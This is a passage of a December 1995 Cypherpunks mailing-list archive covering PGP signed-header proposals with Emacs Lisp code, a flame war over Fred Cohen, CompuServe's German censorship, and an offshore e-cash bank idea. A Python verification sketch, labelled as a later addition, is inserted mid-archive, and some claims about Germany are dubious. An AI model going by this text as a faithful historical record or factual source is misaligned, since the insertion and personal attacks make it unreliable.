    atilla> to ignore the courtesy header. From a standpoint of
    atilla> security, you have blown away each of the attacks outlined
    atilla> in your article in so much as the signature will not
    atilla> compute if the courtesy block is omitted.

    Dimitri> I totally agree; that's why I propose copying that info
    Dimitri> in the signed portion "by default".

    atilla> personally, I do not think PGP 3 should attempt to solve
    atilla> the problem. Most of the headers involved are applied
    atilla> _after_ the message leaves the mail program; and, PGP
    atilla> interfaces are virtually the same as invoking an alternate
    atilla> editor, which gets you nothing.

I agree.  Besides, this whole thing can be done with the existing PGP.
Date: and Message-ID: are two, and they need to be signed.  Date: is a
further problem with Gnus, since the format of the displayed date is
user customizable, but that's a separate issue.

    ...

    Dimitri> The "signed headers" portion may contain the following
    Dimitri> optional fields:

    Dimitri> From: address -- the address associated with the key used
    Dimitri> to sign this message

It's easier to deal with whatever is being used as the From: in the
message.

    ...

    Dimitri> (Of course, the poster could lie and claim in the signed
    Dimitri> portion that the article is being posted to alt.sex.pedo
    Dimitri> when he himself posts it to misc.kids:)

So you would also include the Message-ID:.

    Dimitri> If a standard like this catches on, and is integrated
    Dimitri> into PGP-aware news/e-mail programs, then it's a simple
    Dimitri> exercise to write a little script to look for BEGIN PGP
    Dimitri> SIGNED HEADERS and compare the information inside it with
    Dimitri> the RFC 822/1036 headers outside the signed portion of
    Dimitri> the message. It could be done within PGP too.

This is basically a Good Idea, and can be implemented using existing
tools.

Here is some code to implement it for Gnus.  Verification of the
headers is left (at present) as an exercise for the reader.

;;; Add this to your .gnus and call
;;; gnus-article-sign-message instead of mc-sign directly.
;;; Pgp signed messages are vulnerable to various kinds of badness due to
;;; the separation of header information.  Fix it.

(defconst gnus-pgp-included-headers '("From"
				      "To"
				      "Newsgroups"
				      "Message-ID"
				      "Date"
				      "Subject"
				      "Cc"
				      "Gcc")
  "Headers to include in signed portion of PGP signed message.")

(defconst gnus-pgp-signed-headers "----BEGIN PGP SIGNED HEADERS----\n"
  "String to use for separation in message.")

(defun gnus-article-sign-message (arg)
  "Sign a message with PGP, including outgoing headers in an included
block, as per the suggestion of \"Dr. Dimitri Vulis\" <dlv@bwalk.dm.com>."
  (interactive "p")
  (save-excursion
    (save-restriction
      (gnus-inews-narrow-to-headers)
      (goto-char (point-max))

      (or (mail-fetch-field "date")
	  (insert (concat "Date: " (gnus-inews-date) "\n")))
      (or (mail-fetch-field "message-id")
	  (insert (concat "Message-ID: " (gnus-inews-message-id) "\n")))))

  (save-excursion
    (goto-char (point-max))
    (insert "\n")
    ;; If there is already a header block (eg. after undoing a signature)
    ;; remove it entirely, and rebuild from scratch.
    (if (re-search-backward gnus-pgp-signed-headers nil t)
	  (kill-region (point) (point-max)))
    (insert gnus-pgp-signed-headers)
    (let ((headers gnus-pgp-included-headers)
	  header header-value)
      (while (setq header (car headers))
	(setq headers (cdr headers))
	(save-excursion
	  (save-restriction
	  (gnus-narrow-to-headers)
	  (setq header-value (mail-fetch-field header))))
	(if header-value
	    (insert (concat header ": " header-value "\n"))))
      (insert "\n")))
  (mc-sign arg))

- -- 
steve@miranova.com baur

- ----BEGIN PGP SIGNED HEADERS----
To: cypherpunks@toad.com
Message-ID: <m2n38am8ht.fsf@diana.miranova.com>
Date: 30 Dec 1995 15:34:22 -0800
Subject: Re: easy avoidance of PGP signature forgeries and reuse


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMOXMhKLJZEUiepcNAQGjtgP/ZnC+TL4cbFL3RF+o8fwe2YFciqGkOWX9
VuPK4btnvfKF/wcdMTfJoUKbSutKcwRkbLe5fAqEV3qrXwM7PgfNMlXfcgNg44It
UhfLAaFg6ke5ArWr9EZfyFcD93OrS9qVGU7emSenmsqpdJUE6jU0HmKAQkZzP1Ak
AYQD7ow/tzI=
=PTV7
-----END PGP SIGNATURE-----
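
The header check that this message leaves as an exercise, as an added Python sketch that is not part of the original post or of Gnus/Mailcrypt: it pulls the `----BEGIN PGP SIGNED HEADERS----` block out of the clearsigned body and compares it with the RFC 822 headers outside the signature. It assumes the PGP signature itself has already been verified by PGP; the function names and the sample message are constructed for illustration.

```python
import email
import re

SIGNED_MSG = "-----BEGIN PGP SIGNED MESSAGE-----"
SIG_START = "-----BEGIN PGP SIGNATURE-----"
HDR_MARK = "----BEGIN PGP SIGNED HEADERS----"
# The post says Date: and Message-ID: "need to be signed".
MUST_SIGN = ("Message-ID", "Date")


def _norm(value):
    """Collapse header folding and runs of whitespace before comparing."""
    return " ".join(value.split())


def signed_header_block(body):
    """Return {lower-case name: value} from the signed block, or None."""
    lines = body.splitlines()
    try:
        start = lines.index(SIGNED_MSG)
        end = lines.index(SIG_START, start)
    except ValueError:
        return None
    # Clearsigning prefixes any line starting with "-" with "- "; undo that.
    text = [l[2:] if l.startswith("- ") else l for l in lines[start + 1:end]]
    marks = [i for i, l in enumerate(text) if l.strip() == HDR_MARK]
    if not marks:
        return None
    headers, name = {}, None
    # Use the last marker: the Gnus code appends the block at the very end.
    for line in text[marks[-1] + 1:]:
        if not line.strip():
            break
        if line[0] in " \t" and name:           # folded continuation line
            headers[name] += " " + line.strip()
            continue
        m = re.match(r"([!-9;-~]+):\s*(.*)$", line)
        if not m:
            break
        name = m.group(1).lower()
        headers[name] = m.group(2)
    return headers


def check_signed_headers(raw):
    """Return a list of problems; an empty list means the headers agree."""
    msg = email.message_from_string(raw)
    signed = signed_header_block(msg.get_payload())
    if signed is None:
        return ["no signed header block"]
    problems = []
    for name in MUST_SIGN:
        if name.lower() not in signed:
            problems.append(f"{name}: not covered by the signature")
    for name, value in signed.items():
        outer = msg.get_all(name) or []
        if len(outer) != 1:
            problems.append(f"{name}: {len(outer)} copies in outer headers")
        elif _norm(outer[0]) != _norm(value):
            problems.append(f"{name}: outer {outer[0]!r} != signed {value!r}")
    return problems


# Constructed sample in the format shown in this post (placeholder signature).
SAMPLE = """\
From: alice@example.org
To: list@example.org
Message-ID: <constructed-1@example.org>
Date: 30 Dec 1995 15:34:22 -0800
Subject: Re: signed headers

-----BEGIN PGP SIGNED MESSAGE-----

Body text of the post.

- ----BEGIN PGP SIGNED HEADERS----
To: list@example.org
Message-ID: <constructed-1@example.org>
Date: 30 Dec 1995 15:34:22 -0800
Subject: Re: signed headers

-----BEGIN PGP SIGNATURE-----
(constructed placeholder, not a real signature)
-----END PGP SIGNATURE-----
"""

# The same signed body re-sent under different outer headers (a reuse).
REPLAYED = SAMPLE.replace("To: list@example.org", "To: other@example.org", 1) \
                 .replace("<constructed-1@", "<constructed-2@", 1)

if __name__ == "__main__":
    print(check_signed_headers(SAMPLE))
    print(check_signed_headers(REPLAYED))
```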




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 31 Dec 1995 08:41:41 +0800
To: cypherpunks@toad.com
Subject: new years resolutions for cypherpunks
In-Reply-To: <199512302133.QAA00352@localhost.cjs.net>
Message-ID: <Pine.SOL.3.91.951230152654.292A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Another year, another flamewar :-)
Anyone else prepared to sign something similar?


Simon

-----BEGIN PGP SIGNED MESSAGE-----

In 1996 I resolve to 
	
	1) Avoid ad-hominem attacks even on complete idiots
	2) Not post non-crypto libertarian or conspiracy items to 
	   cypherpunks.
	3) Contribute to, Implement and use open cryptographic standards
	   rather than  proprietary ones.
	4) Have most of my regular internet hosts running IPSEC before 1997.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AwUBMOXNiQkKftKguxLhAQEDsAL/ZoWeONP+R2pJrA9O9RuIu+Juljt04OIB
pFYxH+DfktzDoX0dhfDkrP0TdjMiXnPI7Z5zkidF4O2oUJ0Myzv1F9VSgFXiyU7X
BHUxnazXmhj7crbt86YIwchxqgLGVVNw
=Bwyh
-----END PGP SIGNATURE-----

(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Sun, 31 Dec 1995 06:58:29 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <9512302200.AA14470@all.net>
Message-ID: <199512302211.QAA14605@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> 
> > The Subject says it all... I believe Fred suffers from a severely inflated
> > ego and suffers from the "false expert" syndrome detailed by various
> > self-help orgs... what say you fred??
> 
> People who call me a "false expert" are so afraid of damaging their own
> reputation by doing so that they have to do it anonymously. 

OK, I'll do it.  Fred, sometimes your pontifications make as little sense 
as you arrogantly signing "Dr. Fred Cohen" in your name field.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOW5DCS9AwzY9LDxAQEF3QP/SjHSSva0F/aolc++yrQbL9Mk0V/Nnl60
mxUmDKJ2C8dH9D5EKwwPhgQ1kknp/90JGHztzjKJwG9jkPDixMa1vL3U4iRToy3v
kQ9Ziwr5A/WwMS+6d0++54qMwMEgwVWdmbVJVzrB6VxSPqvVvlmw3t7keBnZGiRA
1dT7Rlq1HsY=
=tm8l
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 31 Dec 1995 07:37:48 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <9512302200.AA14470@all.net>
Message-ID: <199512302133.QAA00352@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> > The Subject says it all... I believe Fred suffers from a severely inflated
> > ego and suffers from the "false expert" syndrome detailed by various
> > self-help orgs... what say you fred??
> 
> People who call me a "false expert" are so afraid of damaging their own
> reputation by doing so that they have to do it anonymously. 

Regardless if it is said anonymously or not, the fact remains that
you are a loon, and you couldn't get a clue if they gave them away in
rice krispies boxes.

As always, I encourage everyone reading this thread to not reply to it
'cuz it does nothing but encourage Freddy to post more jibberish.

> 
> -> See: Info-Sec Heaven at URL http://all.net/
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cees de Groot" <cg@bofh.toad.com (none)>"Cees de Groot" <C.deGroot@inter.nl.net>
Date: Sun, 31 Dec 1995 01:10:28 +0800
To: cypherpunks@toad.com
Subject: Australian "calculatorcard"
Message-ID: <199512301556.QAA31294@bofh.cdg.openlink.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Hi everybody,

Yesterday, on UK Discovery, there was an item in the programme Beyond 2000
about an Australian card which implements a challenge-response protocol
and can be used for banking, etcetera. Basically, you give your card
number (over the phone), get a challenge number, enter your pin and
the challenge, and then give the response. All in CC format...

They plugged it as the ultimate identity-prover, so I'm kind of interested
in what's behind. Now, I know that Discovery constantly repeats old
stuff, so I'm not sure whether this is actually hot/new/... 

Can anybody provide me with pointers to more in-depth information about
this device and the algorithm(s) behind it ?

Thanks

-- 
Cees de Groot, OpenLink Software		     <C.deGroot@inter.NL.net>
262ui/2048: ID=4F018825 FP=5653C0DDECE4359D FFDDB8F7A7970789 [Key on servers]
 -- Any opinions expressed above might be mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Sun, 31 Dec 1995 06:47:42 +0800
To: nobody@c2.org (Anonymous User)
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <199512301723.JAA00902@infinity.c2.org>
Message-ID: <9512302200.AA14470@all.net>
MIME-Version: 1.0
Content-Type: text


> The Subject says it all... I believe Fred suffers from a severely inflated
> ego and suffers from the "false expert" syndrome detailed by various
> self-help orgs... what say you fred??

People who call me a "false expert" are so afraid of damaging their own
reputation by doing so that they have to do it anonymously. 

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 31 Dec 1995 08:48:25 +0800
To: cypherpunks@toad.com
Subject: Guerilla Internet Service Providers
Message-ID: <ad0b11c0300210046f19@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:18 PM 12/30/95, Lucky Green wrote:

>At best, Cypherpunks can hope to provide the infrastructure that will allow
>an underground to communicate semi-securely. We are unable to stop the
>global tidal wave of fascism. Let's not waste our time on bemoaning the
>freedoms crushed in its path. We have more important work to do.

And support your local ISPs!

(Or, even better, direct connection to the Net, though this is harder for
most of us to arrange.)

This CompuServe situation should be a great recruiting opportunity.
Cypherpunks in various parts of the country (and outside the U.S.) can get
active in local AOL, Prodigy, and Compuserve groups (and maybe even Netcom
chat groups, as Netcom is large enough to be a ripe target for harassment
by some zealous prosecutor or tort-crazed lawyer, as the Church of
Scientology case showed). They can tell the folks about local alternatives.

Having lots of small, decentralized providers makes censoring the Net all
the harder. Guerilla Internet Service Providers.

(I'm not disparaging Netcom. Tom Klemesrud not only fought the CoS, he has
also spoken out against CompuServe's action. I just understand that the
"deep pockets" effect means that any ISP large enough to register on the
radar screens of the statists will be targeted for regulation and
sanctioning. Better to have a thousand services, melting into the jungle
when the heavy artillery arrives.)

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <ryan@pobox.com>
Date: Sun, 31 Dec 1995 08:13:42 +0800
To: cypherpunks@toad.com
Subject: Starting an e-cash bank
Message-ID: <199512302305.SAA20998@netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


_Money_ is at the root of control of cyberspace.  If states control the
banks issuing the currency, states will control cyberspace.  If the
banks/issuers of coins are beyond the reach of statist governments,
cyberspace will remain free.  Crypto of course will allow the banks to issue
coins, but if they have to follow statist laws, crypto won't really help
them all that much -- I don't know many bank execs willing to face down the
US Government with nothing to back them up but ~unbreakable codes. 

What would it take to start an anonymous, private, secure, etc. etc. bank
issuing e-cash, located in a country without taxes/etc.?  I assume a tax
haven like the Cayman Islands or a small third world country somewhere would
have plenty of nice tax-shelter banks interested in such a venture.  Of
course, it would be quite illegal to transfer money to such a bank, but once
it's there, wouldn't coins be perfectly legitimate currency?  The bank could
even make money by issuing coins for $US held in vaults, $US invested in
different mutual-fund type things or other currencies, and perhaps even
coins backed only by the bank's profits (sounds like stock).

A cypherpunk?  me?,
Ryan
<ryan@pobox.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frankw@in.net (Frank Willoughby)
Date: Sun, 31 Dec 1995 08:43:09 +0800
To: cypherpunks@toad.com
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <9512302338.AA07501@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


Peter D. Junger writes:

8< [snip]

>One should also notice that Bavaria is only one state in the German
>Federal Republic; this case is more like Texas investigating
>Compuserve than the United States federal government investigating
>Compuserve.  Bavaria is the stronghold of what can properly be called
>the (Catholic) Religious Right in Germany.  It should also be noticed
>that in general German publications and television seem to be less
>constrained in publishing materials that in the United States would be
>called ``indecent'' by some than are United States publications and 
>broadcasters.
>

Peter has made some rather astute and accurate observations.  
(I particularly liked his analogy of Bavaria & Texas.  From my
experience, I would say that Bavaria is the Texas of Germany.)

While the Compuserve incident in Germany may provoke outrage here 
& across the Internet, given the culture and other factors, the 
incident itself was rather inevitable (really).  After having lived
in Munich & Stuttgart, I'm just surprised it took so long to happen.  
(Then again, the wheels of bureaucracy do spin slowly).  8^)  I'm 
not saying I agree with their actions, but I think I do understand 
the mentality behind the actions.

I would venture to guess that the Bavarian State Police were trying
to enforce the JugendSchutzGesetz (Protection of Minors Law).  These
laws are posted in every restaurant, bar, etc.  As indicated by its 
title, the law basically serves to protect minors from the evils of 
the adult world.  It spells out what ages a person has to be to drink 
beer, hard liquor, etc, and covers curfews and other similar topics 
which serve to protect the youth.

The Compuserve censorship may be the result of an interpretation or 
enhancement of the JSG - in that because Compuserve really has no way 
of knowing the age of individuals who have access to pornographic 
materials, it is not capable of fully implementing the JSG.  (Although 
how this differs from cable TV (which shows porno movies and can't 
control who sees them) is beyond me.)

Without commenting on the actions of the Bavarian State Police or 
Compuserve, I think that perhaps we are applying our standards to 
an incident in another culture - without viewing it in the context 
of that culture or country.  (In other words, comparing apples and
oranges.)

FWIW, there are a few differences between the USA and Germany which 
are related to the Compuserve incident and which may help to understand
why the police performed their actions.  I am not saying I agree with 
their actions, only that I think I understand the mentality behind the 
actions.  Anyway, here are a few differences:

1) Germans (and foreigners who live/work there) enjoy fewer freedoms 
   than we do - including freedom of speech, press, assembly, movement,
   etc.

2) The legal system is different than in the USA.  I'm not a lawyer, 
   but my impressions were that the police had far more liberties 
   with what they (legally) can do than do our counterparts here or 
   in other countries.  The OJ fiasco probably couldn't have happened
   in Germany (and he probably also wouldn't have gotten off).

3) There is no real separation of Church & State like we have here in 
   the USA.  As a result, the impact of the Catholic & Lutheran churches 
   on the German legal system & government is significant.  It has also 
   led to the government subsidizing (ie - providing public funds to) 
   the churches.

FWIW, the German government (like every other government on the planet)
is ill-equipped to handle something like the Internet and its impact on 
the social & legal systems of that country.


FWIW, the above is my opinion based on having lived there for over 9 
years.

Best Regards,


Frank

>--
>Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
>Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu

PS - The rest of this mail contains an elaboration of the points mentioned
     earlier.  They were separated from the summarized info mentioned above
     for those who are short on time or have no interest in the long version.

PPS - Four really neat things about Germany are the BDSG (Privacy Act), the
      mandatory (by law) 6-weeks paid vacation for all full-time employees,
      their sausages, and skiing.  (Their sausages are really great.  You
      might even say they're the best of the wurst.  The skiing can be flakey
      on occasion, though.)  8^)  8^)  8^)

PPPS - Have a Happy & Prosperous New Year!  8^)

-----------------------------------------------------------------------------

The following is an elaboration of the above differences, based on 
my observations while I was there.  I'm not taking a stand one way 
or another on these differences in this mail, just indicating what 
they are.

1) Germans (and foreigners who live/work there) enjoy fewer freedoms 
   than we do.  A few examples:

   - it is mandatory (ie - a law) that citizens & foreigners register 
     their domicile address with the police.  (When you move, you have 
     to unregister with the police in your old city, & register with 
     them in the new city).

   - it is not trivial to obtain a permit for a weapon (or obtain a 
     hunting license).

   - it is against the law to monitor police & government frequencies

   - until 1984/85, the radio & TV media were a monopoly of the State 
     (or government).  Commercial (ie - non-government owned) radio &
     TV stations didn't exist until then.  

   - the freedom of speech is more restricted than here.  Use of the 
     swastika symbol is prohibited by law.  Groups attempting to deny
     the abuses of WW II or promoting the rhetoric of the Hitler regime
     are outlawed.  

   - all demonstrations must be registered (and approved) by the police
     before they can occur.

   - mandatory store closings (general).  Most stores are open 'til 6pm 
     on Monday, Tuesday, Wednesday, and Friday.  They stay open late 
     ('til 8:30pm) on Thursdays.  Saturdays, the stores are open 'til 
     2pm unless it is the first Saturday of the month (& then 'til 5pm).

   - all TVs, radios have to be registered with the BundesPost (and you
     will be charged a fee).  The BundesPost uses vans which have the 
     ability to detect which apartments have TVs (as well as which channel
     the individual is watching).  (I have seen the vans & have had a 
     brief conversation with some of the BP employees who have used this
     equipment).


2) The legal system is different than in the USA.  I'm not a lawyer, but 
   my impressions were that the police had far more liberties with what 
   they (legally) can do than do our counterparts here or in other countries.
   On the plus side, the police are very efficient (but having access to 
   a nationwide databank about every person in the country helps to increase
   the efficiency in catching crooks).

   - One law in particular is the JugendSchutzGesetz (Protection of 
     Minors Law).  The JSG spells out exactly what ages a person has
     to be to drink beer, hard liquor, etc.  (I believe it also covers
     curfews, movie ratings, etc.).  The Compuserve censorship may be
     the result of an interpretation or enhancement of the JSG - in
     that because Compuserve really has no way of knowing the age of 
     individuals who have access to pornographic materials, it is not
     capable of fully implementing the JSG.  (Although how this differs
     from cable TV (which offers porno movies) is beyond me.)

   - One thing to be admired, though, is the German Information/Data
     Privacy Act (BundesDatenSchutzGesetz = BDSG).  The BDSG is one
     of the most stringent privacy laws in the world.  Actually, it
     is a shame that we don't have a law like the BDSG (with a few 
     minor changes).  (Our Privacy Act here in the USA is a joke).
     The abuses of privacy which result in the collection and 
     distribution of personal data here in the USA is simply 
     unbelievable.

   - I also had the impression that in the German court system, the 
     burden of proof is on the accused, not the prosecution.  This is
     somewhat analogous to the military courts here in the USA.


3) There is no separation of Church & State like we have here in the USA.

   - All persons who are subject to taxes are required to pay a Church 
     Tax (Kirchensteuer) of 1% of their pay to support a few of the major
     churches in Germany (primarily, the Catholic, the Lutheran, and
     the Jewish religious institutions).  The only exemption to this is
     for those who fill out an affidavit that they have formally left
     their church or those whose voluntary contributions to their church
     exceed 1%.  BTW, the German tax laws also differentiate between 
     members of the 3 churches mentioned above & others.

   - Major religious institutions are subsidized & receive financial 
     support by the government (from the Kirchensteuer), as well as 
     additional funding for the preservation & upkeep of historic 
     religious buildings, etc.  I remember seeing an investigative 
     report on German TV which provided a list of which religious 
     institutions received how much money and the reason why those 
     funds were given to the churches by the government.  I don't 
     remember the actual sums involved, but they were rather large 
     (hundreds of millions of dollars or above, if my memory serves).

   - The Catholic & Lutheran churches in particular have enormous 
     political clout (far more than they ever could here in the USA) 
     and are a force to be reckoned with.  Although from my observations, 
     the Catholic church has more clout than the Lutheran.  Their clout
     has a major impact on the political & legal systems in Germany.
     An illustration of this is that one of the top two political 
     parties in Germany is the CDU (Christian Democratic Union).

   - The ability of a church's missionaries to proselytize is heavily
     regulated/restricted - particularly if they are not one of the 
     top three churches mentioned earlier.

   - In general, the top 3 churches mentioned above are given preferential
     treatment.  Other denominations are generally ignored by the German
     government.

In conclusion:
None of the above statements are intended to be critical of Germans
or of the German government, or anything/anyone else.  These are 
merely my personal observations.
-----------------------------------------------------------------------------
Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800   - http://www.fortified.com/fortified

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 31 Dec 1995 11:07:32 +0800
To: Mark Neely <cypherpunks@toad.com
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <v02120d02ad0baabb44cb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:20 12/31/95, Mark Neely wrote:

>I assume that C$ is only filtering the newsfeed as it hits German shores?
>Please tell me
>they aren't denying access to these "banned" newsgroups for all users
>worldwide!

I am afraid they are.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doc@intellinet.com (Doc)
Date: Sun, 31 Dec 1995 09:43:26 +0800
To: cypherpunks@toad.com
Subject: EMail Blockade for Compuserve?
Message-ID: <199512310121.TAA02917@intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't know if this is a good idea.
I think CI$ shut off the newsgroups due to economic pressure-
from some German officials.  Drop them or we ban CI$.

Now, if CI$ were to shed excess customers in the rest of
the world... they might just turn those newsgroups back on.

So if folks turned on twit filters and deleted-before-reading
mail from anyone@compuserve - and if folks, newsletters etc
refused to SEND mail to accounts@ci$ 
  ...  well if enough ci$ customers were to LEAVE.

This is not a proposal..some of my best friends are at compuserve.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Sun, 31 Dec 1995 10:17:48 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <uB0XgD36w165w@bwalk.dm.com>
Message-ID: <199512310155.TAA12831@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> 
> The following comment has zero crypto relevance and should not be construed
> as an attack on and/or a defense of any particular net.personality:
> 
> "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
> > OK, I'll do it.  Fred, sometimes your pontifications make as little sense
> > as you arrogantly signing "Dr. Fred Cohen" in your name field.
> 
> Without commenting on the quality of anyone's contributions to this mailing
> list, let me remind you that Dr. Fred Cohen received his Ph.D. after writing a
> very innovative thesis on computer viruses, a classic in his field. He has
> every right to call himself "Dr." if he wants to.
> 
> In my experience, people who get so hysterical when a Ph.D. calls himself or
> herself Dr. are invariably Ph.D. dropouts who wasted many years of their lives
> trying and failing to attain a Ph.D. and are bitterly envious of those who have
> succeeded.

Not at all -- but it's been *my* experience that people who rely on 
titles and degrees and such have very little else to recommend them.

I am as unenvious of Mr. Cohen as I am of Bruce Schneier - and Bruce has a
lot more of my respect.  Just because someone writes a "very innovative
thesis" on viruses doesn't mean they know diddly about anything else,
especially cryptography.  Where is Fred's paper?  I've got Bruce's book on
my shelf that I can read for myself and *that's* a classic in the field. 
When "I can read Fred's paper for myself, then I can judge the merits of
his degree.  Until then, I consider him no different than any other PhD
whose gotten themselves a degree and become convinced that the doctorate
entitles them to pontificate upon any and every subject under the sun as
though they knew absolutely everything about any subject that happens to
catch their fancy. 

Just remember - PhD means 'piled higher and deeper'.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOXtjyS9AwzY9LDxAQFoZQQAiBsi6i3tGeY1oJ4bL4UJthdmsW77ZybC
BPpdGBvGc8IyJo9V2uMCW5nU/4LJeX08IAKWS1pt4xTPrz4HlLEJXgAWVnPErTqj
V9MXmI1QY79cmtd2MvJUoUNtq7O4fbD4Hg/ZRRdY3YNZvrlXlRRdbU6m01xSAxOR
4ApMv7cboz4=
=DjDf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Dec 1995 09:59:12 +0800
To: cypherpunks@toad.com
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <199512302211.QAA14605@dal1820.computek.net>
Message-ID: <uB0XgD36w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


The following comment has zero crypto relevance and should not be construed
as an attack on and/or a defense of any particular net.personality:

"Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
> OK, I'll do it.  Fred, sometimes your pontifications make as little sense
> as you arrogantly signing "Dr. Fred Cohen" in your name field.

Without commenting on the quality of anyone's contributions to this mailing
list, let me remind you that Dr. Fred Cohen received his Ph.D. after writing a
very innovative thesis on computer viruses, a classic in his field. He has
every right to call himself "Dr." if he wants to.

In my experience, people who get so hysterical when a Ph.D. calls himself or
herself Dr. are invariably Ph.D. dropouts who wasted many years of their lives
trying and failing to attain a Ph.D. and are bitterly envious of those who have
succeeded.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Burrell <jburrell@crl.com>
Date: Sun, 31 Dec 1995 15:02:31 +0800
To: Mark Neely <accessnt@ozemail.com.au>
Subject: Re: Massey, CEO of Compuserve, on Internet
In-Reply-To: <199512310220.NAA16258@oznet02.ozemail.com.au>
Message-ID: <Pine.SUN.3.91.951230211055.10513A-100000@crl6.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 31 Dec 1995, Mark Neely wrote:

> I assume that C$ is only filtering the newsfeed as it hits German shores?
> Please tell me
> they aren't denying access to these "banned" newsgroups for all users worldwide!
> 
> Mark

Unfortunately, that's exactly what they're doing. Check out
comp.org.eff.talk for more discussion of it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 31 Dec 1995 15:13:31 +0800
To: "cypherpunks@toad.com>
Subject: RE: last straw (or Possible Developments re Censorship)
Message-ID: <01BAD6FD.B8FBF560@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Dr. Dimitri Vulis

And now comes the *point*:

There's much information on CompuServe that cannot be accessed from the outside.
One example is the very informative National Computer Security Association's
